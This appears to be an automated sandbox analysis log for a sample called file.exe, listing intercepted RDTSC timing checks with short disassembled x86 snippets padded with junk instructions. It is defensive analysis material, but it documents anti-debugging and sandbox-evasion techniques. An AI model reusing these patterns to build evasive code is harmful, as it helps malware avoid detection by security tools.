Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAC5B second address: BD121B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE4211E2ABCh 0x00000008 jno 00007FE4211E2AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FE4211E2AB8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d lea eax, dword ptr [ebp+1247E4DBh] 0x00000033 mov dword ptr [ebp+12452C48h], ebx 0x00000039 push eax 0x0000003a jmp 00007FE4211E2AC5h 0x0000003f mov dword ptr [esp], eax 0x00000042 call dword ptr [ebp+122D3194h] 0x00000048 push ebx 0x00000049 pushad 0x0000004a push esi 0x0000004b pop esi 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29147 second address: C2914C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29426 second address: C2944A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FE4211E2AB6h 0x00000012 jno 00007FE4211E2AB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C295A2 second address: C295D2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE420CEA006h 0x00000008 jno 00007FE420CEA006h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FE420CEA00Eh 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE420CEA00Fh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29705 second address: C29710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE4211E2AB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29710 second address: C29722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE420CEA00Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C298AE second address: C298B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C298B2 second address: C298CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007FE420CEA006h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007FE420CEA008h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C298CA second address: C298E7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE4211E2ABFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C298E7 second address: C298EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29BA5 second address: C29BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29BAB second address: C29BB7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE420CEA006h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2DEE5 second address: C2DEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2DEF3 second address: C2DF02 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE420CEA008h 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C391CE second address: C391D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C391D9 second address: C391DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C391DD second address: C391F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2ABBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FE4211E2AB8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37D04 second address: C37D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37E73 second address: C37E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37E7C second address: C37E91 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37E91 second address: C37EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37EA7 second address: C37EC3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE420CEA008h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE420CEA010h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38015 second address: C3801B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3801B second address: C3801F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3801F second address: C38037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007FE4211E2AB6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38037 second address: C3803D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3803D second address: C38050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38ED6 second address: C38F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA00Ch 0x00000009 popad 0x0000000a jmp 00007FE420CEA017h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jo 00007FE420CEA006h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38F08 second address: C38F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A7F8 second address: C3A7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3E2FA second address: C3E301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D624 second address: C3D635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FE420CEA006h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D635 second address: C3D652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FE4211E2ABEh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D652 second address: C3D678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA00Dh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE420CEA00Ah 0x00000010 push ebx 0x00000011 js 00007FE420CEA006h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D91C second address: C3D94D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE4211E2ABAh 0x00000011 jmp 00007FE4211E2AC6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D94D second address: C3D951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D951 second address: C3D957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3DBCF second address: C3DBF0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE420CEA017h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3DBF0 second address: C3DBF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40F48 second address: C40F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA00Eh 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FE420CEA00Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40F70 second address: C40F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FE4211E2AB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40F80 second address: C40F99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA015h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4708B second address: C470A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2AC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C470A3 second address: C470B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE420CEA006h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C470B6 second address: C470BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C470BA second address: C470BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4737C second address: C47382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C475E5 second address: C475EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C475EC second address: C475FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4791E second address: C47928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47928 second address: C4792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4792E second address: C47932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47932 second address: C47938 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47EAC second address: C47EC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE420CEA018h 0x00000008 jmp 00007FE420CEA012h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51977 second address: C5197B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5197B second address: C5198D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FE420CEA006h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5198D second address: C51991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C50D1B second address: C50D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5121F second address: C51233 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jns 00007FE4211E2AB6h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51233 second address: C5123E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51380 second address: C51389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51389 second address: C5138D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5166F second address: C51675 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51675 second address: C516AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FE420CEA006h 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 jmp 00007FE420CEA018h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380A9D second address: 5380ACD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA012h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE420CEA017h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380ACD second address: 5380AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4211E2AC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360247 second address: 5360257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360257 second address: 5360292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE4211E2AC8h 0x00000012 adc eax, 385605B8h 0x00000018 jmp 00007FE4211E2ABBh 0x0000001d popfd 0x0000001e mov dx, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360292 second address: 53602A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA010h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340419 second address: 534041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534041D second address: 5340423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340423 second address: 5340429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340429 second address: 534042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534042D second address: 5340431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340431 second address: 534043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, bl 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534043F second address: 5340487 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE4211E2AC5h 0x0000000e mov ebp, esp 0x00000010 jmp 00007FE4211E2ABEh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE4211E2AC7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340487 second address: 534048C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D18 second address: 5350D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D1C second address: 5350D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D22 second address: 5350D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1D605B37h 0x00000008 pushfd 0x00000009 jmp 00007FE4211E2ABCh 0x0000000e xor ch, 00000028h 0x00000011 jmp 00007FE4211E2ABBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE4211E2AC5h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D61 second address: 5350D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D71 second address: 5350DCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov di, 65DAh 0x00000011 push ebx 0x00000012 mov dx, si 0x00000015 pop ecx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov dl, F9h 0x0000001b pushfd 0x0000001c jmp 00007FE4211E2AC0h 0x00000021 adc esi, 7C091348h 0x00000027 jmp 00007FE4211E2ABBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FE4211E2AC5h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350DCF second address: 5350DD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350DD5 second address: 5350DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380035 second address: 5380084 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE420CEA00Bh 0x00000008 xor cx, 712Eh 0x0000000d jmp 00007FE420CEA019h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebx, eax 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FE420CEA019h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380084 second address: 53800EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FE4211E2ABEh 0x0000000f push eax 0x00000010 pushad 0x00000011 push edi 0x00000012 jmp 00007FE4211E2ABCh 0x00000017 pop eax 0x00000018 mov cx, bx 0x0000001b popad 0x0000001c xchg eax, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cx, F875h 0x00000024 pushfd 0x00000025 jmp 00007FE4211E2AC2h 0x0000002a add esi, 3249FDC8h 0x00000030 jmp 00007FE4211E2ABBh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53800EA second address: 5380115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov dx, 5436h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [76FB65FCh] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE420CEA018h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380115 second address: 538011B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538011B second address: 538011F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538011F second address: 5380123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380123 second address: 5380143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE420CEA014h 0x00000011 rdtsc
